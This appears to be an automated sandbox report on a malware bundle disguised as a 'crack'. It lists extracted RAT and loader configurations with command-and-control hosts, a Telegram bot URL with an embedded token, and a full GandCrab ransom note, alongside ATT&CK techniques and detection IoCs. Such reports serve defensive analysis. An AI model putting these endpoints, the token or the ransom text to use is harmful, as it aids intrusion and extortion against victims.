asyncrat | 67c12eda1cc8358e06ef29eabf1542bf68db9da45df65c52d0ac03246bf75e03

Resubmissions

09-09-2024 23:39

240909-3nkmdswdqm 10

09-09-2024 23:31

09-09-2024 23:11

09-09-2024 22:25

09-09-2024 22:07

09-09-2024 21:53

09-09-2024 21:44

Analysis

max time kernel
237s
max time network
250s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-09-2024 23:11

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

クラック.zip
Size

13.4MB
MD5

6c5fc1a3ba386a83c87700f54d62a96f
SHA1

a05f08de3e4f218ad2567a2695d0ca500fb48ecf
SHA256

67c12eda1cc8358e06ef29eabf1542bf68db9da45df65c52d0ac03246bf75e03
SHA512

0a2573e40287c35c5a05c9b84fd5fd41bacc16c1bb565ee823ff6a42610c151f460a4be6d7009f0a70b648234aa998af27769ae667f4649c223c39c07449a098
SSDEEP

393216:T0Wxsts7B2+qq0a1n5Gy0vdymghya/2yswYpmTg:wGg1+0a1nYvvJghD/2yMM8

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

puked

147.185.221.20:47570

Mutex

20006afb0ec33f2e48c8c1f17d4d3382

Attributes

reg_key
20006afb0ec33f2e48c8c1f17d4d3382
splitter
|'|'|

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes

reg_key
bf7b1fe7a7644171a9985ea45221c25c
splitter
|'|'|

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

xloader

Version

2.6

Campaign

eido

Decoy

revellbb.com

tempranillowine.net

viralstrategies.info

blacktxu.com

flfththirdbank.com

vaoex.com

theselfdirectedinvestor.com

vinadelmar.travel

othersidejimmythemonkey.com

jaguar-landrovercenter-graz.com

supremeosterreich.com

chatsubs.com

free99.design

serviciosmvs.com

bongmecams.xyz

malikwoodson.com

onlinegamebox.club

694624.com

yeezyzapatos.club

istanbul-hairtransplant.com

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-523280732-2327480845-3730041215-1000\HOOZZSPFKP-DECRYPT.txt

Ransom Note

---= GANDCRAB V5.0.3 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .HOOZZSPFKP The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/889bc6d03594d0f9 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZcToFRt3YI7nRWtbfATGuHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wNmoQoAHZIP7k/TfrG1tVzlDb3jcZAB3gql9dnWN0lCD4xdg7bDNQrvH1xSi3FCw+6kfktKtizqdynr7r154JiurEmkUXB6OKs/282Q+t1Gt1YOFqDBiTtqBHfEd0b9ScS4o+4Mqb3Y5NyPYz32XaispQRTRkqF1PXJPcJ15EHwNAoARPLnK8+Au5ZALyfhGEwg6hrKQ3vxBFKwg70Zi7pDhFO3vPLOeat1w4ZMnQeRlGKYDmn1lvgAn90mSDf7SyGQSZnn7Ivlsuw7HIKVYbpfzf2fBccdMBnP2lNhH9XQ3DC3qZBEuHtJEioBZ9MNJGhHpcOfb/LRc8P54k7V/HuibORzJL9NXYEh8sz/ewORahtHP+ZbmbW4eJPXp1eNtQ19EJhJFLe2qhgw2mJLRMzwAtbfjn5E2ENiW4EkrJfTw== ---END PC DATA---

URLs

http://gandcrabmfe6mnef.onion/889bc6d03594d0f9

Extracted

Family

njrat

Version

0.7d

Botnet

kosomk 555

dovelabobzgnan.ddns.net:5552

Mutex

a8c0d4cf5cfc2cc1149b5e071c2ab5df

Attributes

reg_key
a8c0d4cf5cfc2cc1149b5e071c2ab5df
splitter
|'|'|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4536	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	376	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5596	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5432	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	672	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6560	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6796	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6920	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7052	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3296	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6636	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6312	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6600	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6912	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6640	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6992	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6156	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6352	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3824	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6372	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7016	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6596	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	376	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7448	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7492	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7568	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6272	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5124	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7952	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6556	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6996	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7796	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7048	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6416	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6164	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7912	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7020	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6684	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5572	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8180	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6712	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4328	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5604	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6220	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5596	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7796	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7928	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7344	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7404	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5468	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6768	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7916	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1428	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6908	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	1216	schtasks.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7908	1216	schtasks.exe	123

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000001e590-562.dat	family_stormkitty
behavioral1/memory/4620-587-0x00000000006C0000-0x00000000006F2000-memory.dmp	family_stormkitty

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000200000001e590-562.dat	family_asyncrat

DCRat payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000200000001e567-559.dat	dcrat
behavioral1/memory/4892-584-0x0000000000750000-0x0000000000826000-memory.dmp	dcrat
behavioral1/files/0x0003000000022ecf-618.dat	dcrat
behavioral1/memory/5468-642-0x0000000000670000-0x0000000000746000-memory.dmp	dcrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Xloader payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/7156-2314-0x0000000000400000-0x000000000042B000-memory.dmp	xloader
behavioral1/memory/6768-2393-0x0000000000720000-0x000000000074B000-memory.dmp	xloader

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6720	powershell.exe
7624	powershell.exe
7904	powershell.exe
6356	powershell.exe
3680	powershell.exe
6452	powershell.exe
5576	powershell.exe
1568	powershell.exe
5532	powershell.exe
6224	powershell.exe
6268	powershell.exe
5420	Powershell.exe

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3672	netsh.exe
4944	netsh.exe
6280	netsh.exe
7284	netsh.exe
6960	netsh.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00250000000230c1-661.dat	upx
behavioral1/memory/4992-980-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-1082-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-1643-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2067-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2586-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2829-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2345-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2206-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-2979-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-3116-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/4992-690-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x00070000000234a1-735.dat	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
260	discord.com
262	discord.com

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe	クラック.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
6604	4784	WerFault.exe	140
6740	6744	WerFault.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	クラック.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5544	PING.EXE
4596	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
6380	cmd.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4596	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
6284	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\NodeSlot = "11"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	firefox.exe
